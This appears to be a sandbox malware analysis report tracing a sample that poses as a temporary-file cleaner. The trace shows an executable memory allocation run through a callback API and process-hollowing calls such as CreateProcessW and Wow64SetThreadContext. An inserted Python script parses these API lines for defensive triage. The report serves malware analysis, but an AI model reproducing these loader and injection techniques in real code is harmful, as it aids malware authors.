23069->23070 23071 40f455 InitializeCriticalSectionAndSpinCount 23069->23071 23073 40f451 InitializeCriticalSectionEx 23070->23073 23072 40ed77 23071->23072 23072->23064 23073->23072 22912 2408b7 22924 24005f GetPEB 22912->22924 22914 24092e 22925 240838 22914->22925 22916 240936 22917 2409c9 22916->22917 22918 2409e5 CreateFileW 22916->22918 22918->22917 22919 240a0f VirtualAlloc ReadFile 22918->22919 22919->22917 22922 240a3c 22919->22922 22920 240a55 22922->22920 22923 240e38 ExitProcess 22922->22923 22938 24020a 22922->22938 22924->22914 22952 24005f GetPEB 22925->22952 22927 24084c 22953 24005f GetPEB 22927->22953 22929 24085f 22954 24005f GetPEB 22929->22954 22931 240872 22955 2407da 22931->22955 22933 240880 22934 24089c VirtualAllocExNuma 22933->22934 22935 2408a9 22934->22935 22960 24073a 22935->22960 22967 24005f GetPEB 22938->22967 22940 2403b3 22940->22922 22941 2403c1 CreateProcessW 22943 2403eb 22941->22943 22946 240218 22941->22946 22942 240410 ReadProcessMemory 22942->22943 22942->22946 22943->22940 22995 2411f2 22943->22995 22946->22940 22946->22941 22946->22942 22946->22943 22947 2413a1 11 API calls 22946->22947 22949 240675 Wow64SetThreadContext 22946->22949 22951 2411f2 11 API calls 22946->22951 22968 241287 22946->22968 22977 241040 22946->22977 22986 241141 22946->22986 22947->22946 22949->22943 22949->22946 22951->22946 22952->22927 22953->22929 22954->22931 22965 24005f GetPEB 22955->22965 22957 2407ea 22958 2407f0 GetSystemInfo 22957->22958 22959 24081b 22958->22959 22959->22933 22966 24005f GetPEB 22960->22966 22962 240746 22963 240766 VirtualAlloc 22962->22963 22964 240783 22963->22964 22964->22916 22965->22957 22966->22962 22967->22946 22969 2412a2 22968->22969 23004 24013e GetPEB 22969->23004 22971 2412c3 22972 24137b 22971->22972 22973 2412cb 22971->22973 23021 2416cd 10 API calls 22972->23021 23006 240e41 22973->23006 22976 241362 22976->22946 22978 24105b 22977->22978 22979 24013e GetPEB 22978->22979 22980 24107c 22979->22980 22981 
Execution graph (node/edge list of the interactive graph; only the recoverable call paths are kept here):
• 0x240000 region (not PE-backed, see the Memory Dump Source entries below): helper stubs at 24005f, 240109, 24013e and 24017b resolve through GetPEB; 240e41 then calls CreateFileW → VirtualAlloc → ReadFile → VirtualAlloc → (2400da, 240073) → CloseHandle → VirtualFree → VirtualFree. Callers 241084, 24115c and 241205 each do a GetPEB lookup, call 240e41 and continue into one of the 10-API helpers 2416f1, 241703, 2416bb, 241715.
• 0x400000 module: CRT start-up and runtime helpers (40fb81 → 40f675 → 413d9d / 414428 → try_get_function with GetProcAddress, LoadLibraryExW, FreeLibrary, TlsAlloc, InitializeCriticalSectionAndSpinCount; 40fce9 ___security_init_cookie with GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter; 4100bc IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter; 41046c SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess; 41e819 GetStdHandle, GetFileType), C++ locale and code-page initialisation (std::_Lockit, std::_Locinfo, codecvt, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetStringTypeW, TlsSetValue, RtlAllocateHeap / HeapFree, RtlEncodePointer / DecodePointer), and the program's own path 401440 → 401481 → 40151c VirtualAlloc → 401980 → 401546 EnumSystemCodePagesA (the other branch from 401481 goes through 401493 → 41020a GetModuleHandleW).

                                  Control-flow Graph

                                   control_flow_graph (basic blocks; the executed / not-executed marking of the interactive graph is not preserved):
                                   2408b7-2409c7 (call 24005f, call 240838, call 240073 ×8) → 2409ce-2409de → 2409e5-240a08 CreateFileW → 240a0f-240a35 VirtualAlloc, ReadFile → 240a3c-240a4f, which continues either into 240a55-240e22 or into 240e27-240e36 (call 24020a) → 240e38-240e3a ExitProcess. The other branch out of each of those blocks (2409c9, 2409e0, 240a0a, 240a37) reaches the epilogue at 240e3d-240e40.
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  • API ID: AllocNumaVirtual
                                  • String ID:
                                  • API String ID: 4233825816-0
                                  • Opcode ID: 015ea6ec844dbfbb1b46b0e834846bebfcc0176ad037e33cc7ed8c3c18047927
                                  • Instruction ID: daae71057c741c33dbb49de795c18b2d592d167f894f56e73637942cad12b3c1
                                  • Opcode Fuzzy Hash: 015ea6ec844dbfbb1b46b0e834846bebfcc0176ad037e33cc7ed8c3c18047927
                                  • Instruction Fuzzy Hash: 1B127620D5D2D9ADDF06CBE994517FCBFB05E26202F0845C6E5E4F6283C13A839ADB25
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                  • Instruction ID: 3719ef45d24630924a01786e39a02791583fbaae8522c1648bbb936b05ac5c8d
                                  • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                  • Instruction Fuzzy Hash: A1F0A771D2410CABDB0CEAB899856BE77ACDB48300F10457DE706E2141D534899046A0
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00410253
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 111deb4e69d56eb0a367dc8dd8c649a31ca691a76bf32c0556da6b83136cd69b
                                  • Instruction ID: 8b1e4004ee17768b9f14f169c391b7f79f222f34161a18ddefd49df5cc21805c
                                  • Opcode Fuzzy Hash: 111deb4e69d56eb0a367dc8dd8c649a31ca691a76bf32c0556da6b83136cd69b
                                  • Instruction Fuzzy Hash:
                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403C8E
                                  • _Yarn.LIBCPMTD ref: 00403C99
                                  • _Yarn.LIBCPMTD ref: 00403CA4
                                  • _Yarn.LIBCPMTD ref: 00403CAF
                                  • _Yarn.LIBCPMTD ref: 00403CBA
                                  • _Yarn.LIBCPMTD ref: 00403CC5
                                  • _Yarn.LIBCPMTD ref: 00403CD0
                                  • std::bad_exception::bad_exception.LIBCMTD ref: 00403CE3
                                    • Part of subcall function 00404170: std::exception::exception.LIBCONCRTD ref: 0040417E
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403CF1
                                    • Part of subcall function 00410CD6: RaiseException.KERNEL32(?,?,?,0040CC95,?,?,?,?,?,?,?,?,0040CC95,?,0043D2D0), ref: 00410D35
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403CFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  • API ID: Yarn$std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                  • String ID: bad locale name
                                  • API String ID: 1308764326-1405518554
                                  • Opcode ID: f7dabbc8b9a2564522404b5fff6ad0cab2a04412fab3c0770b9d2aed4a3d2d0d
                                  • Instruction ID: fd4ad598886c6da8f32b9fbc51c7598e751e74d590a365a0d9cc1529a84deba6
                                  • Opcode Fuzzy Hash: f7dabbc8b9a2564522404b5fff6ad0cab2a04412fab3c0770b9d2aed4a3d2d0d
                                  • Instruction Fuzzy Hash: F301E170900108FBCB08EFE5DD92BAEB739AF44709F60006EE502372C2DA74AF509799
                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                   control_flow_graph (basic blocks; the executed / not-executed marking of the interactive graph is not preserved):
                                   240e41-240f11 (call 24005f, call 240073 ×7, call 240109, CreateFileW) → 240f17-240f22 → 240f28-240f38 VirtualAlloc → 240f3e-240f4d ReadFile → 240f53-240f72 VirtualAlloc → 240f74-240f87 (call 2400da; 240f89-240f94 → 240f97-240fc0 repeats the call to 2400da) → 240fc2-240fd2 (call 240073) → 240fd4-240fd9 → 240fdb-240fdc CloseHandle → 240fdf-240fea VirtualFree → 24101e-241021 → 241023-241028 → 24102a-241032 VirtualFree → 241035-24103d. The other branch out of each API block (240e41, 240f17, 240f28, 240f3e → 240ff0; 240f53 → 240fec-240fee; 240fc2 → 240ff2) runs through 240ff2-240ff7 → 240ffd-241002 (or 240ff9) into the same 24101e-241021 / VirtualFree tail; 241004-241008, 24100a-241012, 241014-241016, 241018-24101b and 24101d loop back to 24101e-241021.
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30), ref: 00240F07
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F31
                                  • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000), ref: 00240F48
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F6A
                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?,00000000,0000000E), ref: 00240FDC
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?), ref: 00240FE7
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?), ref: 00241032
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                  • String ID:
                                  • API String ID: 721982790-0
                                  • Opcode ID: 1fc8bc8e81ed70493e03acc8cad0cd475d1ad2cc991a5fa7e87ec9c4b6d62fc2
                                  • Instruction ID: 455a5017a8019b85f3a8d71376d294e8fd5e0c94a91765343d50aa5d3f2223c6
                                  • Opcode Fuzzy Hash: 1fc8bc8e81ed70493e03acc8cad0cd475d1ad2cc991a5fa7e87ec9c4b6d62fc2
                                  • Instruction Fuzzy Hash: 4F51B371E20319BBDB249FB4CC85FAEB778AF04710F105525FA41F7280EB7599908B64
                                  Uniqueness Score: -1.00%
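
The API references for the 0x240000 region above (CreateFileW, VirtualAlloc, ReadFile, VirtualFree with raw hex arguments) and the VirtualAlloc / EnumSystemCodePagesA pair the report records for 0040152A are easier to assess once the flag values are decoded. The script below is an added example, not code from the Joe Sandbox report, from Joe Sandbox itself or from the analysed sample: it parses reference lines in the report's `Api.Module(args), ref: addr` format, decodes the VirtualAlloc allocation type and page protection, and flags two patterns a triager looks for, a file read straight into VirtualAlloc'd memory (CreateFileW → VirtualAlloc → ReadFile) and an executable (PAGE_EXECUTE_*) allocation immediately followed by an API whose first parameter is a callback. The sample input is constructed by copying reference lines from this report; the set of callback-taking APIs is an assumption for illustration and is not exhaustive. Note the caveat built into the output: the EnumSystemCodePagesA callback argument is printed as `?` in the trace, so whether it points into the 0x172A-byte PAGE_EXECUTE_READWRITE buffer allocated at 0040152A has to be confirmed from the memory dump, not from the API list alone.

```python
"""Decode 'Api.Module(args), ref: addr' lines and flag allocation patterns.
Added example for reading this report; not code from the report or the sample."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Documented Win32 constants used by VirtualAlloc.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Assumption for illustration (not from the report, not exhaustive): APIs whose
# first parameter is a caller-supplied callback, i.e. a way to run an RWX buffer.
CALLBACK_APIS = {"EnumSystemCodePagesA", "EnumSystemCodePagesW",
                 "EnumSystemLocalesA", "EnumSystemLocalesW", "EnumWindows"}

# Constructed sample input: reference lines copied from this report's "APIs" lists
# (0x240000 region at 00240F07..00240FE7, 0x400000 module at 0040152A..0040154C).
SAMPLE_REFS = """
CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30), ref: 00240F07
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F31
ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000), ref: 00240F48
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040), ref: 00240F6A
CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?,00000000,0000000E), ref: 00240FDC
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,002416D7,7FAB7E30,00241395,00000000,00000040,?), ref: 00240FE7
VirtualAlloc.KERNELBASE(00000000,0000172A,00003000,00000040,00000000,-02FAF080,00000000), ref: 0040152A
EnumSystemCodePagesA.KERNEL32(?,00000000), ref: 0040154C
"""

_LINE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),"
                   r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?'
    ref: int                   # address of the call site


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)      # the report prints signed hex such as -02FAF080


def parse_refs(text: str) -> List[ApiRef]:
    refs = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            args = [_parse_arg(t) for t in m.group("args").split(",")]
            refs.append(ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return refs


def describe_protect(protect: Optional[int]) -> str:
    if protect is None:
        return "?"
    return PAGE_PROTECT.get(protect & 0xFF, f"{protect:#x}")


def is_executable(protect: Optional[int]) -> bool:
    return protect is not None and (protect & 0xF0) != 0  # any PAGE_EXECUTE_* value


def decode_virtual_alloc(r: ApiRef) -> dict:
    """Size, allocation type and protection of a VirtualAlloc reference, as names."""
    size, alloc_type, protect = (r.args + [None] * 4)[1:4]
    types = [n for bit, n in ((MEM_COMMIT, "MEM_COMMIT"), (MEM_RESERVE, "MEM_RESERVE"))
             if alloc_type is not None and alloc_type & bit]
    return {"size": "?" if size is None else f"{size:#x}",
            "type": "|".join(types) or "?",
            "protect": describe_protect(protect),
            "exec": is_executable(protect)}


def file_read_sequences(refs: List[ApiRef]) -> List[int]:
    """Call sites of CreateFileW directly followed by VirtualAlloc and ReadFile."""
    return [refs[i].ref for i in range(len(refs) - 2)
            if (refs[i].api, refs[i + 1].api, refs[i + 2].api)
            == ("CreateFileW", "VirtualAlloc", "ReadFile")]


def find_findings(refs: List[ApiRef]) -> List[Tuple[int, str]]:
    """Executable allocations, and callback-taking APIs called right after one."""
    findings = []
    for i, r in enumerate(refs):
        if r.api != "VirtualAlloc":
            continue
        d = decode_virtual_alloc(r)
        if not d["exec"]:
            continue
        findings.append((r.ref, f"executable allocation: {d['protect']} size {d['size']} ({d['type']})"))
        if i + 1 < len(refs) and refs[i + 1].api in CALLBACK_APIS:
            nxt = refs[i + 1]
            cb = "?" if nxt.args[0] is None else f"{nxt.args[0]:#x}"
            findings.append((nxt.ref, f"{nxt.api} right after RWX VirtualAlloc at {r.ref:#010x}; "
                                      f"callback argument {cb}: confirm from the dump whether it "
                                      f"points into that buffer"))
    return findings


if __name__ == "__main__":
    for ref, text in find_findings(parse_refs(SAMPLE_REFS)):
        print(f"{ref:#010x}: {text}")
```

Run against the sample, the 0x240000 allocations decode to MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE (read buffers, not executable), the CreateFileW at 00240F07 is reported as a file-to-memory read, and the only executable allocation is the PAGE_EXECUTE_READWRITE one at 0040152A, followed at 0040154C by EnumSystemCodePagesA. The script reads the report's own text, so the same functions work on any other function's "APIs" list on this page.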

                                  Control-flow Graph

                                   control_flow_graph (basic blocks; the executed / not-executed marking of the interactive graph is not preserved):
                                   41e11f-41e12b → loop head 41e1bd-41e1c0 → 41e130-41e141 → 41e14e-41e167 LoadLibraryExW. One branch: 41e169-41e172 GetLastError → 41e174-41e186 (call 4265d2) → 41e188-41e19a (call 4265d2) → 41e19c-41e1a9 LoadLibraryExW again; each of these can also fall through to 41e1ab-41e1b8 → 41e1ba → back to the loop head. The other branch: 41e1cd-41e1dd → 41e1df-41e1e0 FreeLibrary → 41e1e6-41e1e8 → 41e1c8-41e1cc (exit); 41e143-41e146 / 41e14c and 41e1c6 are the early-out and loop-exhausted paths. This is the same LoadLibraryExW / GetLastError / FreeLibrary pattern as the try_get_function helper at 413f96 in the execution graph; the function's string references are the api-ms- and ext-ms- prefixes listed under String ID below.
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,D85DCB61,?,0041E22E,?,000000FF,00000000), ref: 0041E1E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: 26e6f5f3ec23ab39baad835987d749df8f6080b1a3dcd10f1b62566cd0fe6c2a
                                  • Instruction ID: db482fff968b2c07073929e9a6fbb895afb52f1d02c0f168ccec13eb267f7f5e
                                  • Opcode Fuzzy Hash: 26e6f5f3ec23ab39baad835987d749df8f6080b1a3dcd10f1b62566cd0fe6c2a
                                  • Instruction Fuzzy Hash: 0221F339A00221BBD7219B22EC54AAB37689B417A0F650522FD06A7390DB78ED41C6D8
                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                   control_flow_graph (basic blocks; the executed / not-executed marking of the interactive graph is not preserved):
                                   4030f0-403128 (call 40caf9, call 404d30, call 4067e0) → 40312c-403130 → 40313a-403142 (call 406540) → 403147-40314d → either 403167-403192 (call 40d3f8) or 40314f-403165 (call 403e40, call 410cd6) → 403195-4031a9 (call 40cb51). The short paths 40312a and 403132-403138 go straight to that final block.
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004030FB
                                  • int.LIBCPMTD ref: 0040310D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040319E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 484487e77d38c6918bdd44bf77138bcdcc21915cbfe8e7e093fd4a89c2bc4538
                                  • Instruction ID: 1d609cfe017e767e3400ef9b6c535b8e005c8793f142d5297fcfe8255119a914
                                  • Opcode Fuzzy Hash: 484487e77d38c6918bdd44bf77138bcdcc21915cbfe8e7e093fd4a89c2bc4538
                                  • Instruction Fuzzy Hash: C8210E74D00108EBCB08DF95D981AEEBBB5AF48305F20826AE51577390D734AF41DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,0000172A,00003000,00000040,00000000,-02FAF080,00000000), ref: 0040152A
                                  • EnumSystemCodePagesA.KERNEL32(?,00000000), ref: 0040154C
                                  Strings
                                  • Temporary files deleted., xrefs: 00401621
                                  • No temporary files found., xrefs: 0040159D
                                  • temporary files found. Do you want to delete them? [Y/N] , xrefs: 004015D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCodeEnumPagesSystemVirtual
                                  • String ID: temporary files found. Do you want to delete them? [Y/N] $No temporary files found.$Temporary files deleted.
                                  • API String ID: 1820785676-2215515840
                                  • Opcode ID: f7bda9f03cb8526571c4ed517181b8191f1cae25bee3d6a74cddce3d9628d361
                                  • Instruction ID: 4ce0347a455e2ce78b6b383f08221b4ccdaa3280c6ffb7ba17c8dde1a9c53ddb
                                  • Opcode Fuzzy Hash: f7bda9f03cb8526571c4ed517181b8191f1cae25bee3d6a74cddce3d9628d361
                                  • Instruction Fuzzy Hash: 8E51AEB0E04218ABCB04EBA6DC52BEEB7B4AF48704F10452EF502B72D1DB7D5905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 177 421dc1-421dda 178 421df0-421df5 177->178 179 421ddc-421dec call 419096 177->179 181 421e02-421e28 call 424257 178->181 182 421df7-421dff 178->182 179->178 186 421dee 179->186 187 421f9e-421faf call 40fcf3 181->187 188 421e2e-421e39 181->188 182->181 186->178 189 421f91 188->189 190 421e3f-421e44 188->190 194 421f93 189->194 192 421e46-421e4f call 40fde0 190->192 193 421e5d-421e68 call 4190ec 190->193 192->194 202 421e55-421e5b 192->202 193->194 204 421e6e 193->204 197 421f95-421f9c call 40ef9b 194->197 197->187 205 421e74-421e79 202->205 204->205 205->194 206 421e7f-421e94 call 424257 205->206 206->194 209 421e9a-421eac call 41e55e 206->209 211 421eb1-421eb5 209->211 211->194 212 421ebb-421ec3 211->212 213 421ec5-421eca 212->213 214 421efd-421f09 212->214 213->197 215 421ed0-421ed2 213->215 216 421f86 214->216 217 421f0b-421f0d 214->217 215->194 219 421ed8-421ef2 call 41e55e 215->219 218 421f88-421f8f call 40ef9b 216->218 220 421f22-421f2d call 4190ec 217->220 221 421f0f-421f18 call 40fde0 217->221 218->194 219->197 231 421ef8 219->231 220->218 230 421f2f 220->230 221->218 232 421f1a-421f20 221->232 233 421f35-421f3a 230->233 231->194 232->233 233->218 234 421f3c-421f54 call 41e55e 233->234 234->218 237 421f56-421f5d 234->237 238 421f7e-421f84 237->238 239 421f5f-421f60 237->239 240 421f61-421f73 call 424311 238->240 239->240 240->218 243 421f75-421f7c call 40ef9b 240->243 243->197
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00421E46
                                  • __alloca_probe_16.LIBCMT ref: 00421F0F
                                  • __freea.LIBCMT ref: 00421F76
                                    • Part of subcall function 004190EC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00419465,?,?,?,00000003,00414846,?,004147B5,?,?,004149C4), ref: 0041911E
                                  • __freea.LIBCMT ref: 00421F89
                                  • __freea.LIBCMT ref: 00421F96
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                   • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 1423051803-0
                                  • Opcode ID: 89db6ee394439e0a0cc8b5c91efdb2608f4b7ca28b2f3df7cd100b76722c822b
                                  • Instruction ID: 99a82e6aae5305e6a53d4475a8a1d8ed1395878dbb0c2ae742f109dfc4491a55
                                  • Opcode Fuzzy Hash: 89db6ee394439e0a0cc8b5c91efdb2608f4b7ca28b2f3df7cd100b76722c822b
                                  • Instruction Fuzzy Hash: B251E672700226AFDB205F62AD41EBB3BA9DF54758B56003FFD14D7260E779DC108668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph 246 24020a-240225 call 24005f 249 240228-24022c 246->249 250 240244-240251 249->250 251 24022e-240242 249->251 252 240254-240258 250->252 251->249 253 240270-24027d 252->253 254 24025a-24026e 252->254 255 240280-240284 253->255 254->252 256 240286-24029a 255->256 257 24029c-24037a call 240073 * 8 255->257 256->255 274 240391 257->274 275 24037c-240386 257->275 277 240395-2403b1 274->277 275->274 276 240388-24038f 275->276 276->277 279 2403b3-2403b5 277->279 280 2403ba 277->280 281 240734-240737 279->281 282 2403c1-2403e9 CreateProcessW 280->282 283 2403f0-240409 282->283 284 2403eb 282->284 289 240410-24042d ReadProcessMemory 283->289 290 24040b 283->290 285 2406e8-2406ec 284->285 287 240731-240733 285->287 288 2406ee-2406f2 285->288 287->281 291 2406f4-2406ff 288->291 292 240705-240709 288->292 293 240434-24043d 289->293 294 24042f 289->294 290->285 291->292 295 240711-240715 292->295 296 24070b 292->296 299 240464-240483 call 241287 293->299 300 24043f-24044e 293->300 294->285 297 240717 295->297 298 24071d-240721 295->298 296->295 297->298 302 240723-240728 call 2411f2 298->302 303 24072d-24072f 298->303 310 240485 299->310 311 24048a-2404ab call 2413a1 299->311 300->299 304 240450-240456 call 2411f2 300->304 302->303 303->281 309 24045b-24045d 304->309 309->299 312 24045f 309->312 310->285 315 2404f0-240510 call 2413a1 311->315 316 2404ad-2404b4 311->316 312->285 323 240517-24052c call 2400da 315->323 324 240512 315->324 317 2404b6-2404e2 call 2413a1 316->317 318 2404eb 316->318 325 2404e4 317->325 326 2404e9 317->326 318->285 329 240535-24053f 323->329 324->285 325->285 